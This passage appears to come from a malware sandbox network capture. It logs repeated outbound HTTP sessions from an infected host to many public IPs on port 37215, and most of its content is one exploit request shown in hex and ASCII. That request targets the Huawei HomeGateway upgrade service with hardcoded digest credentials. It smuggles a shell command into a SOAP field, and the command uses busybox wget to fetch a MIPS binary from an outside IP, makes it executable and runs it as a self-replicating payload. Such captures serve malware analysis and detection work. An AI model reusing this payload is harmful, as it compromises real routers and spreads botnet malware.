69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  140192.168.2.135898041.98.148.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663189888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  141192.168.2.134516841.76.53.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663192987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  142192.168.2.1342848197.202.4.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663237095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  143192.168.2.134083841.196.114.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663242102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  144192.168.2.1350726157.188.202.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663270950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  145192.168.2.135002841.42.102.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663394928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  146192.168.2.133528241.208.121.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663398027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  147192.168.2.133560241.46.229.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663422108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  148192.168.2.1337952157.27.42.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663494110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  149192.168.2.1340546113.54.226.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663495064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  150192.168.2.1351774157.159.100.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.663530111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
